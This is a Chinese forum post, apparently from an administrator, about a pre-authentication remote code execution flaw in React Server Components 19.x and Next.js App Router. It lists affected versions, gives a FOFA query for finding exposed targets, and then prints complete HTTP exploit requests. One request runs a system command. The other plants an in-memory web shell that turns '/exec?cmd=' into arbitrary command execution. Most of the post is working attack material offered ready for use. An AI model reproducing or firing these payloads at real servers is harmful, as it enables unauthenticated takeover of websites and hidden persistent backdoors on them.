TA的每日心情 | 无聊
昨天 09:20 |
|---|
签到天数: 62 天 连续签到: 6 天 [LV.6]常住居民II
管理员
 
- 积分
- 3877
|
在 React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0 中,存在一个预认证远程代码执行漏洞,包括以下包:react-server-dom-parcel、react-server-dom-turbopack,以及 react-server-dom-webpack. 该漏洞代码会不安全地将 HTTP 请求的有效载荷反序列化到 Server Function 端点。经过几天研究,目前该链可以在Next.js的服务端(使用App Router)中无条件触发!经研究发现可影响 Dify,且成功率高.+
受影响的React版本:React 19.0.0React 19.1.0 React 19.1.1React 19.2.0
受影响的Next.js版本:使用React Server Components和App Router的应用程序在以下版本中受到影响:Next.js 15.x系列(所有版本)Next.js 16.x系列(所有版本)Next.js 14.3.0-canary.77及后续canary版本
fofa:app="Next.js" && body="/_next/static/chunks/app/"
POC:
POST /apps HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: 7a3f9c1e
X-Nextjs-Html-Request-Id: 9bK2mPqRtVwXyZ3$@!sT7u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Connection: close
Accept: */*
Accept-Language: en-US,en;q=0.9
Content-Length: 581
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
内存马
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
利用方法:/exec?cmd=id
|
|
|手机版|小黑屋|吾要学习网
( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号
发表于